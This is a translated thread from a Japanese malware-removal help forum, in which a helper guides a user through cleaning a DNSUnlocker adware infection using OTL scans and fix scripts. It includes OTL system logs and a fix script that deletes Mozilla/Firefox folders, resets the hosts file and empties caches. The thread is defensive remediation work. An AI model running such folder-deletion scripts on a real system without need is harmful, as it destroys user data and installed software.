[2015/02/13 17:57:57 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
[2015/01/09 07:31:54 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Media Player\アート キャッシュ
[2014/04/01 21:31:51 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn
[2014/05/06 04:02:09 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn1
[2015/06/16 21:11:40 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn2
[2015/07/08 21:48:36 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn3
[2015/06/10 15:43:46 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame
[2015/06/10 15:43:45 | 000,565,248 | -H-- | M] (NHN Japan Corp.) -- C:\Users\kaito\AppData\Roaming\Hangame\hgstarterjp.exe
[2015/06/10 17:50:08 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame\HUL
[2014/04/16 23:21:26 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
[2015/06/10 15:28:53 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\IETldCache\Low
[2015/09/11 09:27:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Desktop
[2009/07/14 11:34:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Favorites
[2014/04/13 00:58:19 | 000,000,000 | RH-D | M] -- C:\Users\Public\Libraries
[2014/12/19 17:25:39 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\LocalService\AppData
[2014/04/02 21:12:09 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\NetworkService\AppData

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/09/12 17:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/12 00:02:08 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/12 17:02:38 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/12 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/12 16:48:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000LPVX-22V0TT0
Partitions: 3
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 18.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 19328401408
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 448.00GB
Starting Offset: 19433259008
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2015/03/04 13:41:26 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/21 12:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/07/14 16:24:58 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/09/21 20:51:57 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/21 12:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/21 12:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/21 12:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
No service found with a name of WinDefend
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/21 12:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

< End of report >


That is all.
  • あすとろ
  • 2015/09/12 (Sat) 23:46:20
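This is bad
Firefox is infected.
We will reinstall Firefox later, but first we have to get it out of its infected state.
Please uninstall Firefox using GU.
Once the uninstall is complete, let's carry out the fix with OTL.

Start Notepad and copy and paste the following.
Note that :OTL, :Files, :Commands and so on are directives that determine how OTL processes the script.
Please take care not to delete them.

------ copy and paste from below this line ------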
:Files
%userprofile%\AppData\Local\Mozilla
%appdata%\Mozilla
%programdata%\Mozilla
%programfiles(x86)%\Mozilla Firefox
:Commands
[purity]
[resethosts]
[emptyflash]
[emptyjava]
[emptytemp]
[createrestorepoint]
[reboot]
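------ copy and paste up to above this line ------

Once you have pasted it, save the file under an easily recognisable name.
After that, boot the PC into Safe Mode.
Start OTL again and copy and paste the contents you saved above into the Custom Scan/Fixes box.
Since this is a removal job, there are no other options to tick this time.
Click the red-lettered [Run Fix] to start the fix.
Follow OTL's prompts; the fix log is displayed either before or after the reboot into normal mode,
so please paste that log in your reply.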
  • IVNO
  • MAIL
  • 2015/09/12 (Sat) 23:58:16
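Re: DNSunlocker infection
Thank you for the quick reply.

> This is bad
Was it really in that bad a state... (lol)
After Chrome, the infection has now been confirmed in Firefox as well; is IE all right?

In any case, the work is done, so I am pasting the OTL log.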


All processes killed
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Mozilla\updates folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla folder moved successfully.
C:\ProgramData\Mozilla\logs folder moved successfully.
C:\ProgramData\Mozilla folder moved successfully.
File/Folder C:\Program Files (x86)\Mozilla Firefox not found.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: All Users

User: Default
->Flash cache emptied: 57311 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Flash cache emptied: 59994 bytes

User: Public

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: All Users

User: Default

User: Default User

User: 【ユーザー名】
->Java cache emptied: 0 bytes

User: Public

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 152808094 bytes
->Temporary Internet Files folder emptied: 103997577 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 357293226 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1365381666 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 43308949 bytes
RecycleBin emptied: 87819123 bytes

Total Files Cleaned = 2,013.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09132015_014108

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
File\Folder C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\【ユーザー名】\AppData\Roaming\Dropbox\shellext \l\5429c4da not found!
File\Folder C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\【ユーザー名】\AppData\Roaming\Dropbox\shellext \l\5429c4e0 not found!

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/13 (Sun) 01:55:36
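Reinstall Firefox and collect the OTL log again
Because Firefox could not be handled with OTL in the usual way,
I had you follow this procedure at short notice,
but now let's reinstall Firefox.
https://www.mozilla.org/ja/firefox/new/
Once the reinstall is complete, please collect the OTL log again using the same procedure.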
  • IVNO
  • MAIL
  • 2015/09/13 (Sun) 03:46:26
Re: DNSunlocker infection
The reinstall is finished, so I am pasting the log.


All processes killed
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\thumbnails folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\startupCache folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\safebrowsing folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2\entries folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2\doomed folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default\cache2 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles\vcoo9lwt.default folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox\Profiles folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla\Firefox folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Mozilla folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\webapps folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home\idb folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\moz-safe-about+home folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome\idb\2918063365piupsah.files folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome\idb folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent\chrome folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage\permanent folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\storage folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\sessionstore-backups folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\minidumps folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\healthreport folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\gmp folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\datareporting folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\crashes\events folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\crashes folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default\bookmarkbackups folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\vcoo9lwt.default folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Crash Reports\events folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Crash Reports folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Mozilla folder moved successfully.
File/Folder C:\ProgramData\Mozilla not found.
C:\Program Files (x86)\Mozilla Firefox\webapprt folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\uninstall folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1 folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\dictionaries folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\defaults\pref folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\defaults folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\components folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox folder moved successfully.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: All Users

User: Default
->Flash cache emptied: 0 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Flash cache emptied: 0 bytes

User: Public

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: All Users

User: Default

User: Default User

User: 【ユーザー名】
->Java cache emptied: 0 bytes

User: Public

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 163556 bytes
->Temporary Internet Files folder emptied: 33191 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 382393871 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 15295 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 143553 bytes

Total Files Cleaned = 365.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09132015_165735

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/13 (Sun) 17:02:41
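That is the Firefox removal procedure
Running that procedure removes Firefox entirely.
It has in fact been removed entirely, so please reinstall Firefox once more.
The procedure I meant is not that one but this one.

Please prepare the following software.

OldTimer Listit (commonly known as OTL)
http://oldtimer.geekstogo.com/OTL.exe
This is a direct link. Save it somewhere easy to find, such as the desktop.
To remove it, start it and press the "Cleanup" button; it will then be deleted automatically.

Before starting OTL, close as much software as possible, including browsers.
Once the software has been closed, start OTL.
Tick Scan All Users at the top centre of the window.
Once that is set, copy and paste the following into the Custom Scan/Fixes box.

------ copy and paste from below this line ------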
SHOWHIDDEN
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
ACTIVEX
CREATERESTOREPOINT
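------ copy and paste up to above this line ------

Once you have pasted it, click Run Scan to run the scan.
The scan takes a few minutes to complete, so please wait.
When the scan is complete, OTL.txt and Extras.txt are written to the same location where you saved OTL,
so please paste them in your reply.
Note that, by its nature, OTL output is very long.
This board's character limit is about 30,000 characters counted as hiragana, or about 60,000 counted as alphanumerics.
The log will certainly exceed the limit, so, leaving a margin, aim for parts of around 55,000 characters each,
checking with a character counter such as the one at the URL below, and post the log in split parts.
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html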
  • IVNO
  • MAIL
  • 2015/09/13 (Sun) 17:37:02
OTL1
Sorry for the misunderstanding and for the late reply...

Without further ado, here is the log.

OTL logfile created on: 2015/09/14 16:45:26 - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.31 Gb Available Physical Memory | 60.25% Memory free
7.68 Gb Paging File | 6.16 Gb Available in Paging File | 80.24% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.84 Gb Free Space | 25.21% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
PRC - [2015/09/06 10:28:08 | 055,175,056 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
PRC - [2015/09/06 10:28:08 | 001,378,192 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
